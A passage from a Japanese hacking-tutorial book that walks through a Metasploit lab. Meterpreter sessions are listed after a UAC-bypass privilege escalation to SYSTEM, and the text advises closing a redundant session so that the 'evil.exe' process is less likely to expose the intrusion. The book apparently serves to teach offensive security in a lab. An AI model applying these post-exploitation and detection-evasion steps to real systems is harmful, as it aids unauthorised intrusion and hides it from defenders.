
256
第2部 ハッキングを体験する
⑪ 不 要なセッションを閉じる
一度セッション2 から抜けて、全体のセッションを確認します。
meterpreter > background
[*] Backgrounding session 2...
msf exploit(windows/local/bypassuac) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows IE8WIN7¥IEUser @ IE8WIN7 10.0.0.2:4444 ↲
-> 10.0.0.102:49160 (10.0.0.102)
2 meterpreter x86/windows NT AUTHORITY¥SYSTEM @ IE8WIN7 10.0.0.2:4444 ↲
-> 10.0.0.102:49161 (10.0.0.102)
セッション1と2 は同一ターゲットに対するセッションであり、セッション 2 で
はSYSTEM権限になっているため、セッション 1 は不要といえます。ターゲット
端末のタスクマネージャーの「Process」タブには "evil.exe" と表示されます。こ
れを消しておけば、侵入がばれにくいといえます。セッションを閉じるには、-k オ
プションでセッション ...